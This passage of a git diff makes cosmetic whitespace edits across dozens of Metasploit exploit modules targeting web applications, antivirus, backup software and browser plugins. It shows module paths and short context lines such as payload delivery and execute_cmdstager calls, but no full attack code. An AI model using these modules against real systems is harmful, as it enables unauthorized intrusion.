a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -95,5 +95,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("No response from the server") end end - end diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb index 217814691e..32e9d32107 100644 --- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb +++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index 5b309f6c67..d8562ff00d 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index 2a418abb0b..0bdf9cbb5e 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -117,5 +117,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Server returned #{res.code.to_s}") end end - end diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index 1b3c95b9bc..5de5db94d4 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -222,7 +222,6 @@ class MetasploitModule < Msf::Exploit::Remote print_good("Exploitation was successful") end - end =begin diff --git a/modules/exploits/unix/webapp/freepbx_config_exec.rb b/modules/exploits/unix/webapp/freepbx_config_exec.rb index bb462efe5e..cbfcd5eaa6 100644 --- a/modules/exploits/unix/webapp/freepbx_config_exec.rb +++ b/modules/exploits/unix/webapp/freepbx_config_exec.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/unix/webapp/generic_exec.rb b/modules/exploits/unix/webapp/generic_exec.rb index 4957968d4d..ddff3d5093 100644 --- a/modules/exploits/unix/webapp/generic_exec.rb +++ b/modules/exploits/unix/webapp/generic_exec.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb index a3ccf707bb..73562550e3 100644 --- a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb +++ b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb @@ -134,5 +134,4 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET' }, 5) end - end diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index 6452e9be9f..0c183e3763 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -139,5 +139,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Shutting down the web service...") stop_service end - end diff --git a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb index 5281d925b3..dffd4370c4 100644 --- a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb +++ b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb @@ -148,5 +148,4 @@ class MetasploitModule < Msf::Exploit::Remote def autofilter true end - end diff --git a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb index c97fd5475e..b3ac2b1241 100644 --- a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb +++ b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb @@ -188,5 +188,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb index e1e4f71ffa..b921f78a8c 100644 --- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb +++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb @@ -261,5 +261,4 @@ class MetasploitModule < Msf::Exploit::Remote }) end - end diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index 4294856111..8360c2045f 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -226,5 +226,4 @@ class MetasploitModule < Msf::Exploit::Remote }) end - end diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb index 8f04854df8..b3dd4e2826 100644 --- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb +++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb @@ -172,5 +172,4 @@ class MetasploitModule < Msf::Exploit::Remote }, 25) end - end diff --git a/modules/exploits/unix/webapp/mambo_cache_lite.rb b/modules/exploits/unix/webapp/mambo_cache_lite.rb index c0cec65eb5..64e5e575d9 100644 --- a/modules/exploits/unix/webapp/mambo_cache_lite.rb +++ b/modules/exploits/unix/webapp/mambo_cache_lite.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb index cc57fc9f8c..ca00c27274 100644 --- a/modules/exploits/unix/webapp/mitel_awc_exec.rb +++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb index 3ed6d4bbae..556535b165 100644 --- a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb +++ b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb @@ -267,7 +267,6 @@ class MetasploitModule < Msf::Exploit::Remote }, 5) end - end diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index 6331d39b57..9e128be9dd 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -244,5 +244,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Unknown response #{res.code}") end - end diff --git a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb index b52a038e46..de4ce0e9b3 100644 --- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb +++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb @@ -101,5 +101,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Unknown response") end - end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index 50d1f81dd4..ea910cd113 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -175,5 +175,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb index e774020144..84e884333f 100644 --- a/modules/exploits/unix/webapp/openemr_upload_exec.rb +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb @@ -124,5 +124,4 @@ class MetasploitModule < Msf::Exploit::Remote print_error("Server returned #{res.code.to_s}") end end - end diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb index 2eb61dbe3f..7f1a908c5d 100644 --- a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb @@ -76,5 +76,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("No response from the server") end end - end diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index 76ded9b546..172e161911 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -343,5 +343,4 @@ class MetasploitModule < Msf::Exploit::Remote true end - end diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 45826cb1a1..8489f43c37 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -151,5 +151,4 @@ EOS handler end - end diff --git a/modules/exploits/unix/webapp/pajax_remote_exec.rb b/modules/exploits/unix/webapp/pajax_remote_exec.rb index 92d8de50b7..d8f222b293 100644 --- a/modules/exploits/unix/webapp/pajax_remote_exec.rb +++ b/modules/exploits/unix/webapp/pajax_remote_exec.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("No response from the server") end end - end diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 0becc14a37..013ab127f6 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -123,5 +123,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index 28e0f2d200..3a042281a6 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote end handler end - end diff --git a/modules/exploits/unix/webapp/seportal_sqli_exec.rb b/modules/exploits/unix/webapp/seportal_sqli_exec.rb index 19c1323b47..b58bf4672b 100644 --- a/modules/exploits/unix/webapp/seportal_sqli_exec.rb +++ b/modules/exploits/unix/webapp/seportal_sqli_exec.rb @@ -168,5 +168,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index d19c9e5c9c..6ee06ef428 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -255,5 +255,4 @@ print "RCE unlink payload requiring CGI: $frozen\n"; } }, 5) end - end diff --git a/modules/exploits/unix/webapp/spip_connect_exec.rb b/modules/exploits/unix/webapp/spip_connect_exec.rb index 0ee26fbe68..193def8267 100644 --- a/modules/exploits/unix/webapp/spip_connect_exec.rb +++ b/modules/exploits/unix/webapp/spip_connect_exec.rb @@ -95,5 +95,4 @@ class MetasploitModule < Msf::Exploit::Remote } }) end - end diff --git a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb index cfbfb4f881..28565cfaa1 100644 --- a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb +++ b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb @@ -109,5 +109,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Waiting for a payload session (backgrounding)...") end - end diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index 41a8037b82..cb3d240758 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb @@ -221,5 +221,4 @@ class MetasploitModule < Msf::Exploit::Remote uri << query uri end - end diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 439cc1faa3..9137247c38 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -122,5 +122,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index da9e5c1eb8..6177998f91 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -214,7 +214,6 @@ class MetasploitModule < Msf::Exploit::Remote print_good("Exploitation was successful") end - end =begin diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index 9a01eec87a..35eabfcb87 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -118,5 +118,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index e859422404..3e1760f904 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb @@ -194,5 +194,4 @@ class MetasploitModule < Msf::Exploit::Remote print_good("Exploitation looks feasible, proceeding... ") request("#{payload.encoded}", 1) end - end diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index b4ff5385d7..5722bb1a0c 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -149,5 +149,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb index 0537735874..7a261964db 100644 --- a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -90,6 +90,5 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index 5130d7964b..ebc0437680 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -263,6 +263,5 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}") end end - end diff --git a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb index f497a2b8e1..23708793ce 100644 --- a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb +++ b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb @@ -76,5 +76,4 @@ class MetasploitModule < Msf::Exploit::Remote 'Infusionsoft', 'utilities', php_pagename) }, 2) end - end diff --git a/modules/exploits/unix/webapp/wp_lastpost_exec.rb b/modules/exploits/unix/webapp/wp_lastpost_exec.rb index 933931faab..6f7783bf44 100644 --- a/modules/exploits/unix/webapp/wp_lastpost_exec.rb +++ b/modules/exploits/unix/webapp/wp_lastpost_exec.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("No response from the server") end end - end diff --git a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb index 74f7cd15ca..34cd1c1382 100644 --- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb +++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb @@ -192,5 +192,4 @@ class MetasploitModule < Msf::Exploit::Remote super end end - end diff --git a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb index 848d52a1c2..f3797ce7ed 100644 --- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, 'ERROR') end end - end diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index b272e9827d..824548514b 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -126,5 +126,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Server returned #{res.code.to_s}") end end - end diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb index df35117e40..e38de8d90a 100644 --- a/modules/exploits/unix/webapp/zeroshell_exec.rb +++ b/modules/exploits/unix/webapp/zeroshell_exec.rb @@ -150,5 +150,4 @@ class MetasploitModule < Msf::Exploit::Remote execute_cmdstager({:flavor => :echo}) end - end diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index 557756416c..ae17e5c66d 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -140,5 +140,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index 0b4f60f47c..8fdf5c6b1d 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -150,5 +150,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Executing payload...") exec(base, token, sid, user_salt_cookie) end - end diff --git a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb index 18a1fa89b7..1596412783 100644 --- a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb +++ b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb @@ -121,6 +121,5 @@ class MetasploitModule < Msf::Exploit::Remote xml_s end - end diff --git a/modules/exploits/windows/antivirus/symantec_iao.rb b/modules/exploits/windows/antivirus/symantec_iao.rb index 83889b0adb..9dc808021f 100644 --- a/modules/exploits/windows/antivirus/symantec_iao.rb +++ b/modules/exploits/windows/antivirus/symantec_iao.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/antivirus/symantec_rtvscan.rb b/modules/exploits/windows/antivirus/symantec_rtvscan.rb index ba56aa712f..7b225e8a4b 100644 --- a/modules/exploits/windows/antivirus/symantec_rtvscan.rb +++ b/modules/exploits/windows/antivirus/symantec_rtvscan.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index c88d3bced3..4480e25b4b 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -353,5 +353,4 @@ class MetasploitModule < Msf::Exploit::Remote stream end - end diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb index 71967dccc1..3d8f8f289b 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb index d156a222b8..6f747278af 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb index 5cc87238a3..dd4f3bbafa 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb index 28e5ee8982..bf1b0233fd 100644 --- a/modules/exploits/windows/arkeia/type77.rb +++ b/modules/exploits/windows/arkeia/type77.rb @@ -112,5 +112,4 @@ class MetasploitModule < Msf::Exploit::Remote seh = generate_seh_payload( target['Rets'][0] ) data[ 96, seh.length] = seh end - end diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb index 3e61c997aa..0d53d5d263 100644 --- a/modules/exploits/windows/backupexec/name_service.rb +++ b/modules/exploits/windows/backupexec/name_service.rb @@ -105,7 +105,6 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index b479e4b90b..d835733726 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb @@ -126,5 +126,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index f20eacf09f..e61950b2e1 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -138,5 +138,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index fee7f9f844..8a876b2597 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -122,5 +122,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect_udp end - end diff --git a/modules/exploits/windows/brightstor/etrust_itm_alert.rb b/modules/exploits/windows/brightstor/etrust_itm_alert.rb index 8816b0b322..2f268d681b 100644 --- a/modules/exploits/windows/brightstor/etrust_itm_alert.rb +++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb @@ -78,7 +78,6 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end =begin diff --git a/modules/exploits/windows/brightstor/hsmserver.rb b/modules/exploits/windows/brightstor/hsmserver.rb index 069c1dc138..c1a476e5d8 100644 --- a/modules/exploits/windows/brightstor/hsmserver.rb +++ b/modules/exploits/windows/brightstor/hsmserver.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/brightstor/lgserver.rb b/modules/exploits/windows/brightstor/lgserver.rb index e72aa4a84b..d2126dc105 100644 --- a/modules/exploits/windows/brightstor/lgserver.rb +++ b/modules/exploits/windows/brightstor/lgserver.rb @@ -63,5 +63,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb index 8758fa3c7c..74684f447e 100644 --- a/modules/exploits/windows/brightstor/lgserver_multi.rb +++ b/modules/exploits/windows/brightstor/lgserver_multi.rb @@ -98,5 +98,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb index ce607fa39a..d986fa5d8a 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb index d629e28076..f269e1a264 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb index 5fe97fc76c..135e83c940 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/brightstor/license_gcr.rb b/modules/exploits/windows/brightstor/license_gcr.rb index 5f0d0fb67d..b6b476338f 100644 --- a/modules/exploits/windows/brightstor/license_gcr.rb +++ b/modules/exploits/windows/brightstor/license_gcr.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb index 885c65d1bd..2926a29e27 100644 --- a/modules/exploits/windows/brightstor/message_engine.rb +++ b/modules/exploits/windows/brightstor/message_engine.rb @@ -74,5 +74,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/brightstor/message_engine_heap.rb b/modules/exploits/windows/brightstor/message_engine_heap.rb index fe92b27d82..39733869e2 100644 --- a/modules/exploits/windows/brightstor/message_engine_heap.rb +++ b/modules/exploits/windows/brightstor/message_engine_heap.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/brightstor/sql_agent.rb b/modules/exploits/windows/brightstor/sql_agent.rb index 179eae262c..5ce02da5b2 100644 --- a/modules/exploits/windows/brightstor/sql_agent.rb +++ b/modules/exploits/windows/brightstor/sql_agent.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect } end - end diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb index 0375663ece..ef96a08b56 100644 --- a/modules/exploits/windows/brightstor/tape_engine.rb +++ b/modules/exploits/windows/brightstor/tape_engine.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb index 277907707c..5ccf7ea520 100644 --- a/modules/exploits/windows/brightstor/universal_agent.rb +++ b/modules/exploits/windows/brightstor/universal_agent.rb @@ -98,7 +98,6 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb index 672e0d3473..2bdad3ea32 100644 --- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb @@ -572,5 +572,4 @@ EOF pdf << "%%EOF" << eol pdf end - end diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb index 06876f75a2..5d6edb5e92 100644 --- a/modules/exploits/windows/browser/adobe_flash_avm2.rb +++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb @@ -129,5 +129,4 @@ class MetasploitModule < Msf::Exploit::Remote swf end - end diff --git a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb index dd07054cc3..789d7bc043 100644 --- a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb +++ b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb @@ -104,5 +104,4 @@ class MetasploitModule < Msf::Exploit::Remote swf end - end diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb index 53b56338d5..ec7b6a790d 100644 --- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb +++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Exploit::Remote swf end - end diff --git a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb index 4dcea0bb91..234eafe705 100644 --- a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb @@ -109,5 +109,4 @@ class MetasploitModule < Msf::Exploit::Remote swf end - end diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb index 